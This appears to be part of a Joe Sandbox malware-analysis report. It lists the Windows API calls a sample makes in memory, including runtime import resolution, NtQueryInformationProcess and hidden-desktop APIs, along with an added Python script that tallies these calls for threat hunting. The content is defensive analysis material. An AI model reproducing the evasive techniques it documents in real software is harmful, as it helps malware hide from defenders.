                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------
                                                    • API String ID: 2041821634-2370822465

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
                                                    • strlen.MSVCRT ref: 00404A4F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0
                                                    Similarity
                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                    • API String ID: 2127927946-3329630956

                                                    Control-flow Graph

                                                    APIs
                                                    • GetProcAddress.KERNEL32(75550000,00929C68), ref: 00426419
                                                    • GetProcAddress.KERNEL32(75550000,00929CC8), ref: 00426432
                                                    • GetProcAddress.KERNEL32(75550000,00929C50), ref: 0042644A
                                                    • GetProcAddress.KERNEL32(75550000,00929CB0), ref: 00426462
                                                    • GetProcAddress.KERNEL32(75550000,009254D0), ref: 0042647B
                                                    • GetProcAddress.KERNEL32(75550000,00923348), ref: 00426493
                                                    • GetProcAddress.KERNEL32(75550000,00923328), ref: 004264AB
                                                    • GetProcAddress.KERNEL32(75550000,00929CE0), ref: 004264C4
                                                    • GetProcAddress.KERNEL32(75550000,00929CF8), ref: 004264DC
                                                    • GetProcAddress.KERNEL32(75550000,00948008), ref: 004264F4
                                                    • GetProcAddress.KERNEL32(75550000,00947F60), ref: 0042650D
                                                    • GetProcAddress.KERNEL32(75550000,009231C8), ref: 00426525
                                                    • GetProcAddress.KERNEL32(75550000,00947F18), ref: 0042653D
                                                    • GetProcAddress.KERNEL32(75550000,009480C8), ref: 00426556
                                                    • GetProcAddress.KERNEL32(75550000,00923188), ref: 0042656E
                                                    • GetProcAddress.KERNEL32(75550000,009480B0), ref: 00426586
                                                    • GetProcAddress.KERNEL32(75550000,00947E88), ref: 0042659F
                                                    • GetProcAddress.KERNEL32(75550000,00923408), ref: 004265B7
                                                    • GetProcAddress.KERNEL32(75550000,00947FD8), ref: 004265CF
                                                    • GetProcAddress.KERNEL32(75550000,00923368), ref: 004265E8
                                                    • LoadLibraryA.KERNEL32(00947E28,?,?,?,00421BE3), ref: 004265F9
                                                    • LoadLibraryA.KERNEL32(00948050,?,?,?,00421BE3), ref: 0042660B
                                                    • LoadLibraryA.KERNEL32(00947F90,?,?,?,00421BE3), ref: 0042661D
                                                    • LoadLibraryA.KERNEL32(00948038,?,?,?,00421BE3), ref: 0042662E
                                                    • LoadLibraryA.KERNEL32(00948068,?,?,?,00421BE3), ref: 00426640
                                                    • GetProcAddress.KERNEL32(75670000,00947FC0), ref: 0042665D
                                                    • GetProcAddress.KERNEL32(75750000,00947FA8), ref: 00426679
                                                    • GetProcAddress.KERNEL32(75750000,00947F30), ref: 00426691
                                                    • GetProcAddress.KERNEL32(76BE0000,00948020), ref: 004266AD
                                                    • GetProcAddress.KERNEL32(759D0000,00923388), ref: 004266C9
                                                    • GetProcAddress.KERNEL32(773F0000,00925520), ref: 004266E5
                                                    • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004266FC
                                                    Strings
                                                    • NtQueryInformationProcess, xrefs: 004266F1
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: NtQueryInformationProcess
                                                    • API String ID: 2238633743-2781105232
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00422A16
                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A
                                                    Similarity
                                                    • API ID: Heap$AllocNameProcessUser
                                                    • String ID:
                                                    • API String ID: 1206570057-0

                                                    Control-flow Graph

                                                    APIs
                                                    • GetProcAddress.KERNEL32(75550000,009232C8), ref: 00426725
                                                    • GetProcAddress.KERNEL32(75550000,00923448), ref: 0042673D
                                                    • GetProcAddress.KERNEL32(75550000,00947F78), ref: 00426756
                                                    • GetProcAddress.KERNEL32(75550000,009481A0), ref: 0042676E
                                                    • GetProcAddress.KERNEL32(75550000,00948170), ref: 00426786
                                                    • GetProcAddress.KERNEL32(75550000,009481D0), ref: 0042679F
                                                    • GetProcAddress.KERNEL32(75550000,0094AD18), ref: 004267B7
                                                    • GetProcAddress.KERNEL32(75550000,00948110), ref: 004267CF
                                                    • GetProcAddress.KERNEL32(75550000,00948128), ref: 004267E8
                                                    • GetProcAddress.KERNEL32(75550000,00948140), ref: 00426800
                                                    • GetProcAddress.KERNEL32(75550000,00948158), ref: 00426818
                                                    • GetProcAddress.KERNEL32(75550000,00923468), ref: 00426831
                                                    • GetProcAddress.KERNEL32(75550000,009234C8), ref: 00426849
                                                    • GetProcAddress.KERNEL32(75550000,00923488), ref: 00426861
                                                    • GetProcAddress.KERNEL32(75550000,009234A8), ref: 0042687A
                                                    • GetProcAddress.KERNEL32(75550000,00948188), ref: 00426892
                                                    • GetProcAddress.KERNEL32(75550000,0094E2E0), ref: 004268AA
                                                    • GetProcAddress.KERNEL32(75550000,0094AAC0), ref: 004268C3
                                                    • GetProcAddress.KERNEL32(75550000,009234E8), ref: 004268DB
                                                    • GetProcAddress.KERNEL32(75550000,0094E118), ref: 004268F3
                                                    • GetProcAddress.KERNEL32(75550000,0094E130), ref: 0042690C
                                                    • GetProcAddress.KERNEL32(75550000,0094E160), ref: 00426924
                                                    • GetProcAddress.KERNEL32(75550000,0094E280), ref: 0042693C
                                                    • GetProcAddress.KERNEL32(75550000,00923508), ref: 00426955
                                                    • GetProcAddress.KERNEL32(75550000,0094E370), ref: 0042696D
                                                    • GetProcAddress.KERNEL32(75550000,0094E208), ref: 00426985
                                                    • GetProcAddress.KERNEL32(75550000,0094E1A8), ref: 0042699E
                                                    • GetProcAddress.KERNEL32(75550000,0094E3A0), ref: 004269B6
                                                    • GetProcAddress.KERNEL32(75550000,0094E298), ref: 004269CE
                                                    • GetProcAddress.KERNEL32(75550000,0094E358), ref: 004269E7
                                                    • GetProcAddress.KERNEL32(75550000,0094E2F8), ref: 004269FF
                                                    • GetProcAddress.KERNEL32(75550000,0094E1C0), ref: 00426A17
                                                    • GetProcAddress.KERNEL32(75550000,0094E148), ref: 00426A30
                                                    • GetProcAddress.KERNEL32(75550000,0094A7B8), ref: 00426A48
                                                    • GetProcAddress.KERNEL32(75550000,0094E1F0), ref: 00426A60
                                                    • GetProcAddress.KERNEL32(75550000,0094E3B8), ref: 00426A79
                                                    • GetProcAddress.KERNEL32(75550000,009232E8), ref: 00426A91
                                                    • GetProcAddress.KERNEL32(75550000,0094E100), ref: 00426AA9
                                                    • GetProcAddress.KERNEL32(75550000,00923168), ref: 00426AC2
                                                    • GetProcAddress.KERNEL32(75550000,0094E0D0), ref: 00426ADA
                                                    • GetProcAddress.KERNEL32(75550000,0094E220), ref: 00426AF2
                                                    • GetProcAddress.KERNEL32(75550000,00923308), ref: 00426B0B
                                                    • GetProcAddress.KERNEL32(75550000,00922D68), ref: 00426B23
                                                    • LoadLibraryA.KERNEL32(0094E388,0042067A), ref: 00426B35
                                                    • LoadLibraryA.KERNEL32(0094E0E8), ref: 00426B46
                                                    • LoadLibraryA.KERNEL32(0094E178), ref: 00426B58
                                                    • LoadLibraryA.KERNEL32(0094E190), ref: 00426B6A
                                                    • LoadLibraryA.KERNEL32(0094E1D8), ref: 00426B7B
                                                    • LoadLibraryA.KERNEL32(0094E238), ref: 00426B8D
                                                    • LoadLibraryA.KERNEL32(0094E2B0), ref: 00426B9F
                                                    • LoadLibraryA.KERNEL32(0094E328), ref: 00426BB0
                                                    • GetProcAddress.KERNEL32(75750000,00922DC8), ref: 00426BCC
                                                    • GetProcAddress.KERNEL32(75750000,0094E310), ref: 00426BE4
                                                    • GetProcAddress.KERNEL32(75750000,009483D8), ref: 00426BFD
                                                    • GetProcAddress.KERNEL32(75750000,0094E250), ref: 00426C15
                                                    • GetProcAddress.KERNEL32(75750000,00922E68), ref: 00426C2D
                                                    • GetProcAddress.KERNEL32(73AA0000,0094A980), ref: 00426C4D
                                                    • GetProcAddress.KERNEL32(73AA0000,00922E88), ref: 00426C65
                                                    • GetProcAddress.KERNEL32(73AA0000,0094A8B8), ref: 00426C7E
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E340), ref: 00426C96
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E268), ref: 00426CAE
                                                    • GetProcAddress.KERNEL32(73AA0000,00923148), ref: 00426CC7
                                                    • GetProcAddress.KERNEL32(73AA0000,00922DE8), ref: 00426CDF
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E2C8), ref: 00426CF7
                                                    • GetProcAddress.KERNEL32(757E0000,00922EA8), ref: 00426D13
                                                    • GetProcAddress.KERNEL32(757E0000,00923108), ref: 00426D2B
                                                    • GetProcAddress.KERNEL32(757E0000,0094E400), ref: 00426D44
                                                    • GetProcAddress.KERNEL32(757E0000,0094E490), ref: 00426D5C
                                                    • GetProcAddress.KERNEL32(757E0000,00922D88), ref: 00426D74
                                                    • GetProcAddress.KERNEL32(758D0000,0094AAE8), ref: 00426D94
                                                    • GetProcAddress.KERNEL32(758D0000,0094AB88), ref: 00426DAC
                                                    • GetProcAddress.KERNEL32(758D0000,0094E460), ref: 00426DC5
                                                    • GetProcAddress.KERNEL32(758D0000,00922E08), ref: 00426DDD
                                                    • GetProcAddress.KERNEL32(758D0000,00922E28), ref: 00426DF5
                                                    • GetProcAddress.KERNEL32(758D0000,0094A930), ref: 00426E0E
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E3D0), ref: 00426E2E
                                                    • GetProcAddress.KERNEL32(76BE0000,00923088), ref: 00426E46
                                                    • GetProcAddress.KERNEL32(76BE0000,00948318), ref: 00426E5F
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E478), ref: 00426E77
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E3E8), ref: 00426E8F
                                                    • GetProcAddress.KERNEL32(76BE0000,00922DA8), ref: 00426EA8
                                                    • GetProcAddress.KERNEL32(76BE0000,00922EC8), ref: 00426EC0
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E418), ref: 00426ED8
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E430), ref: 00426EF1
                                                    • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426F07
                                                    • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426F1E
                                                    • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00426F35
                                                    • GetProcAddress.KERNEL32(75670000,00922FA8), ref: 00426F51
                                                    • GetProcAddress.KERNEL32(75670000,0094E448), ref: 00426F69
                                                    • GetProcAddress.KERNEL32(75670000,0094E9B8), ref: 00426F82
                                                    • GetProcAddress.KERNEL32(75670000,0094E8B0), ref: 00426F9A
                                                    • GetProcAddress.KERNEL32(75670000,0094E868), ref: 00426FB2
                                                    • GetProcAddress.KERNEL32(759D0000,00922EE8), ref: 00426FCE
                                                    • GetProcAddress.KERNEL32(759D0000,00922E48), ref: 00426FE6
                                                    • GetProcAddress.KERNEL32(76D80000,00922F08), ref: 00427002
                                                    • GetProcAddress.KERNEL32(76D80000,0094EA78), ref: 0042701A
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F28), ref: 0042703A
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923028), ref: 00427052
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922FC8), ref: 0042706B
                                                    • GetProcAddress.KERNEL32(6F7E0000,0094E970), ref: 00427083
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F48), ref: 0042709B
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923068), ref: 004270B4
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F68), ref: 004270CC
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923048), ref: 004270E4
                                                    • GetProcAddress.KERNEL32(6F7E0000,InternetSetOptionA), ref: 004270FB
                                                    • GetProcAddress.KERNEL32(6F7E0000,HttpQueryInfoA), ref: 00427112
                                                    • GetProcAddress.KERNEL32(75480000,0094EA18), ref: 0042712E
                                                    • GetProcAddress.KERNEL32(75480000,00948338), ref: 00427146
                                                    • GetProcAddress.KERNEL32(75480000,0094E958), ref: 0042715F
                                                    • GetProcAddress.KERNEL32(75480000,0094E8E0), ref: 00427177
                                                    • GetProcAddress.KERNEL32(753B0000,00923008), ref: 00427193
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094E988), ref: 004271AF
                                                    • GetProcAddress.KERNEL32(6C7D0000,00922FE8), ref: 004271C7
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094EA48), ref: 004271E0
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094E928), ref: 004271F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$P2Wu$1Wu
                                                    • API String ID: 2238633743-1673689602
                                                    • Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                    • Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
                                                    • Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                    • Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0
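                                                    The resolver above issues 8 LoadLibraryA and 107 GetProcAddress calls. In all but five of the GetProcAddress calls the export-name argument is a pointer in the 0x0092xxxx to 0x0094xxxx range rather than a plaintext string; those addresses lie outside the mapped image (base 0x400000, sections listed up to 0x64A000 in the Memory Dump Source), so the names are materialised in runtime memory and a string scan of the on-disk PE will not see them. Only the five plaintext names (CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA, HttpQueryInfoA) are visible to a static rule. The Python helper below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses "APIs" lines in the format printed above and tallies, per module handle, how many exports were resolved and how many names were plaintext versus runtime pointers. The embedded input is a constructed eight-line excerpt of the listing above, and the image upper bound 0x650000 is an assumption (the report gives the start of the last section, 0x64A000, but not its size).

```python
"""Tally a Joe Sandbox 'APIs' listing of a LoadLibraryA/GetProcAddress import resolver.

Added example for this report, not code from Joe Sandbox or from the analysed sample.
Input lines look like the ones listed above:
    • GetProcAddress.KERNEL32(75550000,009232C8), ref: 00426725
    • LoadLibraryA.KERNEL32(0094E388,0042067A), ref: 00426B35
"""
import re
from collections import defaultdict

# Constructed sample: an eight-line excerpt of the 115 calls listed above.
SAMPLE = """\
• GetProcAddress.KERNEL32(75550000,009232C8), ref: 00426725
• GetProcAddress.KERNEL32(75550000,00923448), ref: 0042673D
• LoadLibraryA.KERNEL32(0094E388,0042067A), ref: 00426B35
• LoadLibraryA.KERNEL32(0094E0E8), ref: 00426B46
• GetProcAddress.KERNEL32(75750000,00922DC8), ref: 00426BCC
• GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426F07
• GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426F1E
• GetProcAddress.KERNEL32(6F7E0000,InternetSetOptionA), ref: 004270FB
"""

# Mapped image per the Memory Dump Source list: base 0x400000, last section at 0x64A000.
# The upper bound is an assumption; the report does not give the final section's size.
IMAGE_LO, IMAGE_HI = 0x00400000, 0x00650000

API_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_calls(text):
    """Return (api, [args], ref_address) for every line that matches the listing format."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue  # headers such as 'APIs' or 'Strings' are skipped
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        calls.append((m["api"], args, int(m["ref"], 16)))
    return calls


def classify_name(arg):
    """Plaintext export name, pointer into the image, or pointer into runtime memory."""
    if not HEX8.match(arg):
        return "plaintext"
    ptr = int(arg, 16)
    return "image" if IMAGE_LO <= ptr < IMAGE_HI else "runtime"


def summarize(text):
    """Group GetProcAddress calls by module handle; count LoadLibraryA calls."""
    loadlibrary = 0
    modules = defaultdict(lambda: {"total": 0, "runtime": 0, "image": 0, "plaintext": []})
    for api, args, _ref in parse_calls(text):
        if api == "LoadLibraryA":
            loadlibrary += 1
        elif api == "GetProcAddress" and len(args) >= 2:
            handle, name = args[0], args[1]
            kind = classify_name(name)
            entry = modules[handle]
            entry["total"] += 1
            if kind == "plaintext":
                entry["plaintext"].append(name)
            else:
                entry[kind] += 1
    return {"loadlibrary_calls": loadlibrary, "modules": dict(modules)}


if __name__ == "__main__":
    report = summarize(SAMPLE)
    print(f"LoadLibraryA calls: {report['loadlibrary_calls']}")
    for handle, entry in sorted(report["modules"].items()):
        print(f"module {handle}: {entry['total']} resolved, "
              f"{entry['runtime']} runtime-pointer names, "
              f"{entry['image']} in-image names, plaintext: {entry['plaintext']}")
```

                                                    Run over the full 115-line listing, the same code gives the per-module breakdown that an import-hash of the on-disk file cannot: the resolver's import set only exists in the dumped process, so hunting for it means matching the LoadLibraryA/GetProcAddress call sequence or the memory dump, not the PE import table.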
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
                                                    • lstrlenA.KERNEL32(0042D01C), ref: 0041F357
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
                                                    • lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
                                                    • lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
                                                    • lstrlenA.KERNEL32(00923268), ref: 0041F476
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F506
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
                                                    • lstrlenA.KERNEL32(00948378), ref: 0041F8C2
                                                    • lstrcpy.KERNEL32(00000000,00948378), ref: 0041F8EF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F966
                                                    • lstrcpy.KERNEL32(00000000,00948378), ref: 0041FA28
                                                    • lstrcpy.KERNEL32(00000000,009482D8), ref: 0041FA58
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
                                                    • lstrlenA.KERNEL32(00948248), ref: 0041FC03
                                                    • lstrcpy.KERNEL32(00000000,00948248), ref: 0041FC30
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
